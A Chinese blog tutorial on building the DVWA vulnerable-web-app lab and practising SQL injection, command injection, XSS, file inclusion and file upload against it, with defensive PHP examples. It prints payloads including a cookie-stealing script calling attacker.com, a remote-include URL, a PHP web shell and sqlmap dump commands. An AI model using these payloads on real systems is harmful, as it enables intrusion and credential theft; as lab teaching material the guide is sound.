DVWA漏洞靶场实战项目

原创 于 2025-12-16 22:52:55 发布 · 558 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #dvwa #靶场 #漏洞

DVWA漏洞靶场实战项目

一、项目概述

DVWA(Damn Vulnerable Web Application)是一个专门用于安全漏洞学习和测试的PHP/MySQL Web应用。本项目将带你完成DVWA靶场的搭建、配置和漏洞实战演练。

二、环境搭建

1. 准备工作

方案一:使用Docker(推荐)

# 拉取DVWA镜像
docker pull vulnerables/web-dvwa

# 运行容器
docker run -d -p 80:80 --name dvwa vulnerables/web-dvwa

方案二:本地安装(XAMPP/WAMP)

  1. 下载XAMPP:https://www.apachefriends.org/
  2. 下载DVWA:https://github.com/digininja/DVWA
  3. 将DVWA解压到htdocs目录
  4. 启动Apache和MySQL服务

2. 初始化配置

# 访问DVWA
http://localhost

# 点击"Create/Reset Database"创建数据库
# 默认登录凭据:
# 用户名:admin
# 密码:password

三、安全等级设置

  • Low:无防护,用于学习漏洞原理
  • Medium:基础防护,需绕过简单过滤
  • High:较强防护,需高级绕过技巧
  • Impossible:最佳实践防护

四、核心漏洞实战

1. SQL注入(SQL Injection)

Low等级攻击:

-- 基础注入
1' OR '1'='1
-- 获取数据库信息
1' UNION SELECT user(), database()-- 
-- 获取表名
1' UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=database()--

防御措施:

  • 使用参数化查询
  • 对输入进行严格过滤
  • 最小权限原则

2. 命令注入(Command Injection)

攻击示例:

127.0.0.1 && whoami
127.0.0.1 | cat /etc/passwd
127.0.0.1; ls -la

防御措施:

  • 使用白名单验证输入
  • 避免使用系统调用函数
  • 使用安全的API替代

3. 跨站脚本(XSS)

反射型XSS:

<script>alert(document.cookie)</script>
<svg onload=alert(1)>

存储型XSS:

<script>new Image().src="http://attacker.com/steal?cookie="+document.cookie</script>

防御措施:

  • 输出编码
  • 设置HttpOnly Cookie
  • 使用CSP策略

4. 文件包含(File Inclusion)

本地文件包含:

../../../../etc/passwd
php://filter/convert.base64-encode/resource=index.php

远程文件包含:

http://attacker.com/shell.txt

5. 文件上传漏洞

攻击步骤:

  1. 创建恶意PHP文件
<?php system($_GET['cmd']); ?>
  1. 修改文件扩展名绕过检测
  2. 访问上传的文件执行命令

五、自动化测试工具实践

1. 使用Burp Suite

配置流程:
1. 设置浏览器代理
2. 拦截HTTP请求
3. 使用Intruder模块进行暴力破解
4. 使用Repeater模块修改请求
5. 使用Scanner自动扫描漏洞

2. 使用SQLMap

# 基础扫描
sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxx; security=low"

# 获取数据库
sqlmap -u <URL> --cookie=<COOKIE> --dbs

# 获取表名
sqlmap -u <URL> --cookie=<COOKIE> -D dvwa --tables

# 获取数据
sqlmap -u <URL> --cookie=<COOKIE> -D dvwa -T users --dump

六、实战演练任务清单

漏洞类型难度任务要求完成状态
SQL注入Low获取所有用户信息
SQL注入Medium绕过过滤获取数据
XSS反射型Low弹出当前Cookie
XSS存储型Medium窃取管理员Cookie
文件上传High上传WebShell并执行命令
CSRFMedium构造恶意页面修改密码

七、防御代码示例

1. 安全的SQL查询(PHP)

// 使用预处理语句
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$stmt->execute(['id' => $userId]);
$result = $stmt->fetchAll();

2. XSS防护

// 输出编码
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

// 设置CSP头
header("Content-Security-Policy: default-src 'self'");

3. 安全的文件上传

// 检查文件类型
$allowed_types = ['image/jpeg', 'image/png'];
if (!in_array($_FILES['file']['type'], $allowed_types)) {
    die("Invalid file type");
}

// 重命名文件
$new_filename = uniqid() . '.' . $extension;

八、学习路线建议

第一阶段:基础入门(1-2周)

  1. 完成环境搭建和基本配置
  2. 逐个尝试Low等级的所有漏洞
  3. 理解每种漏洞的原理

第二阶段:进阶挑战(2-3周)

  1. 尝试Medium和High等级
  2. 学习绕过技巧
  3. 使用自动化工具辅助测试

第三阶段:深入分析(1周)

  1. 查看Impossible级别的源代码
  2. 理解最佳防御实践
  3. 尝试编写自己的防护代码

九、注意事项

  1. 合法授权:仅在授权的测试环境中使用
  2. 备份数据:测试前备份重要数据
  3. 网络隔离:在隔离的网络环境中测试
  4. 学习目的:仅用于学习网络安全知识

十、扩展资源

  1. 官方文档:https://github.com/digininja/DVWA
  2. CTF挑战:尝试其他漏洞靶场如WebGoat、bWAPP
  3. 在线平台:HackTheBox、TryHackMe
  4. 相关书籍:《Web安全深度剖析》《白帽子讲Web安全》

项目总结:通过DVWA实战项目,你可以系统性地学习Web安全漏洞的原理、利用方式和防御方法。建议按照从易到难的顺序逐步深入,并结合实际代码分析加深理解。安全测试不仅是技术学习,更需要良好的职业道德和法律意识。

DVWA靶场SQL注入
Tangyoo的博客
07-03 1696
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
DVWA简介及靶场实战-CSRF跨站请求伪造
mmxhappy的专栏
01-23 2813
CSRF攻击的本质是重要操作的所有参数,都可以被攻击者猜测到,所以token值是必须的。观察以下源码,这里是添加了Anti-CSRF token机制,用户每次到改密页面的时候,服务器会返回一个随机token,向服务器发起请求需要提交token参数,而在服务器收到请求的时候,会优先检查token,只有token正确才会处理客户端请求。本质上,这样的逻辑代码设计本身就不合理,HTTP协议设计的初衷中,GET型请求就需要保证“幂等性”,即无论发出了多少次GET请求,和仅发出一次请求所产生的效果应该是相同的。
DVWA漏洞靶场实战指南:从零搭建到渗透测试
gitblog_00130的博客
11-23 635
DVWA(Damn Vulnerable Web Application)是一个专为网络安全教育设计的PHP/MySQL漏洞靶场,为安全从业者、开发者和学生提供了一个可控的实验环境。通过模拟真实世界的Web应用漏洞,你可以在这里安全地学习和实践各种安全测试技术,同时掌握相应的防御措施。 ## 为什么选择DVWA进行安全学习 在当今数字化时代,Web应用安全已成为每个开发者和安全工程师必须掌握的
【kali-Linux】DVWA搭建漏洞靶场_kali搭建dvwa靶场,详细讲解
2401_84138785的博客
04-18 1223
四轮技术面+一轮hr面结束,学习到了不少,面试也是一个学习检测自己的过程,面试前大概复习了 一周的时间,把以前的代码看了一下,字节跳动比较注重算法,面试前刷了下leetcode和剑指offer, 也刷了些在牛客网上的面经。大概就说这些了,写代码去了~祝大家都能收获大厂offer~篇幅有限,仅展示部分内容网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加V获取:vip1024c (备注前端)
XSS DVWA靶场演示
YancyYue颜悦的专栏
08-29 802
DVWA靶场上XSS的基本介绍还有搭配其他在线测试平台的结合使用
DVWA漏洞靶场搭建与安全测试实战指南
gitblog_00261的博客
11-24 440
DVWA(Damn Vulnerable Web Application)是一款专为网络安全学习设计的漏洞靶场平台,集成了SQL注入、XSS跨站脚本、文件包含等十余种常见Web漏洞,通过四个难度级别为安全研究人员提供从基础到高级的攻防演练环境。本文将深入解析DVWA的核心架构,并提供完整的部署配置与实战测试方案。 ## 核心功能模块解析 DVWA采用模块化设计理念,将不同漏洞类型独立封装,便于
【kali-Linux】DVWA搭建漏洞靶场_kali搭建dvwa靶场,2024年最新网络安全入门你值得拥有
2401_84254406的博客
04-10 1171
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
DVWA靶场的XSS和SQL注入实战
bwxzdjn的博客
03-25 1170
对XSS和SQL注入学习后的实操,主要是借助DVWA靶场,通过对不同分类和过滤的实战,进一步掌握不同分类的XSS和SQL注入攻击方法。(不包含不可能章节)
DVWA靶场命令注入漏洞实战分析与防御方案
ThunderstormDragon65的博客
10-28 510
实践时,我发现其内置的Linux环境非常适合复现这类漏洞场景。无需配置本地环境,生成项目后直接通过网页终端就能测试各种注入手法,部署演示站点也只需点击一次按钮,对网络安全学习非常友好。特别是可以快速切换不同防御级别的代码版本,直观对比安全效果差异。:当应用将用户输入直接拼接到系统命令中执行时,攻击者通过插入特殊字符(如;& |)来截断原命令并执行恶意指令。管道符(|):将前命令输出作为后命令输入。IP地址需验证四段数字范围(0-255)防御缺失:未对任何特殊字符进行处理。仍存在缺陷:未处理全角字符等变形。
从“点击弹窗”到“CI CD”-DVWA漏洞靶场实战项目在毕业设计方面的应用与DevSecOps实践.docx
11-27
内容概要:本文探讨了如何将DVWA漏洞靶场实战项目融入高校毕业设计,结合DevSecOps理念构建集成本、安全与自动化于一体的实践教学新模式。通过搭建GitLab+Docker+Jenkins技术栈,学生可在MR中提交漏洞修复代码,并由...
网络安全基于DVWA的Web漏洞靶场实战:SQL注入与暴力破解攻防技术研究
12-01
内容概要:本文详细介绍了DVWA(Damn Vulnerable Web Application)漏洞靶场的搭建过程与核心漏洞实战利用方法。涵盖环境部署(PHPStudy和Docker两种方式)、常见Web漏洞(如SQL注入、暴力破解、文件上传)在不同...
网络安全CTF靶场DVWA
01-02
网络安全CTF靶场DVWA是一项专为网络安全爱好者设计的模拟实战平台,它是一个虚拟的网络环境,模拟真实世界中网站的安全漏洞,供学习者进行渗透测试和安全研究。DVWA全称为Damn Vulnerable Web Application,直译为...
第十一篇:Day31-33 前端安全与性能监控——从“能用”到“安全可靠”(对标职场“系统稳定性”需求)
2402_87628679的博客
12-11 1239
对于小型项目或特定业务场景,可通过自定义埋点实现核心指标监控,无需接入复杂工具。// src/utils/monitor.js(自定义监控工具) import axios from 'axios';// 监控数据上报接口(后端提供) const MONITOR_UPLOAD_URL = '/api/monitor/upload';
安全审查--跨站请求伪造--双重提交Cookie模式
petunsecn的专栏
12-12 699
本文详细讲解了双重提交Cookie模式防御CSRF攻击的原理与实现。首先通过网上银行转账案例展示了CSRF攻击的危害性,解释了攻击者如何利用浏览器自动携带Cookie的特性发起恶意请求。随后深入剖析了双重提交Cookie的核心理念:利用同源策略,要求请求同时携带Cookie中的token和请求头/体中的token进行双重验证。 文章从零开始演示了实现步骤:1)服务器设置可被JavaScript读取的CSRF Token Cookie;2)前端获取Cookie中的token并添加到请求头;3)服务器验证两个t
DNS协议安全
weixin_61562383的博客
12-12 996
许多企业的防火墙会拦截内部员工直接访问外部网站的 HTTP/TCP 连接,但通常会放行 DNS 流量,因为员工需要解析域名才能工作。阴影域名:黑客攻破了合法网站(如 example.com)的管理权,创建了恶意的子域名(如 bad.example.com)。DNS 协议在设计之初就像是在“明信片”上写字,任何人都可以拦截、修改(中间人攻击),或者伪造一张新的明信片发给你(欺骗/投毒)。:为了防止命令控制服务器(C&C)的域名被封杀,僵尸程序会内置一套算法,每天自动生成成千上万个随机域名。
App反诈骗:一场面向移动生态的深度安全战争(接上文短信反诈)
最新发布
xixixi7777的博客
12-12 1329
App反诈骗的最终目标是构建一个安全、可信、透明技术支柱:持续创新的检测与防御技术制度支柱:完善的法律法规与行业标准治理支柱:跨平台、跨行业的协同治理机制教育支柱:提升开发者和用户的安全意识经济支柱:建立正向激励与惩罚机制与短信反诈相比,App反诈的战场更广、链条更长、对抗更复杂。这是一场技术、法律、经济、社会的综合性战役,其成功不仅需要先进的技术手段,更需要生态系统各方的共同责任和长期投入。真正的App反诈不是简单的"查杀",而是通过纵深防御、主动狩猎、生态治理。
AI安全威胁:对抗样本到数据隐私全解析(13种安全威胁及防护)
m0_62396717的博客
12-11 802
本文系统梳理了大模型面临的安全与隐私威胁,包括常规安全威胁(对抗样本攻击、后门攻击、投毒攻击)和新型安全威胁(内容安全问题、恶意使用风险、资源消耗攻击等)。同时分析了数据隐私风险(成员推断、数据提取等)和知识产权威胁(模型萃取、提示词窃取)。针对这些威胁,提出了包括对抗训练、数据清洗、差分隐私等在内的多层次防御体系,强调需要技术、法规等多角度协同应对。随着攻击手段不断演进,防御措施也需持续更新完善。
RSA不属于安全算法吗?
SmallBull的博客
12-11 522
RSA 本身是安全的算法,“不安全” 的情况几乎都是「配置不当、实现漏洞或场景误用」导致的。在实际工作中,只要严格遵循密钥长度、实现库选择、使用场景的规范,RSA 仍是可靠的安全方案。
渗透测试行业术语扫盲(第十篇)—— 利用与提权类术语
qq_39241682的博客
12-11 900
发现漏洞只是开始,将其转化为实际的控制权才是关键。本篇聚焦渗透测试中最具技术性的核心环节:**利用**与**提权**。我们将系统学习攻击者如何将理论上的漏洞(Vulnerability)转化为实际的攻击武器(Exploit),如何获取初步的访问界面(Shell),并最终突破限制,攀登至系统权限的顶峰(Root/提权)。同时,也会涵盖为达成这些目标所需的关键支撑技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值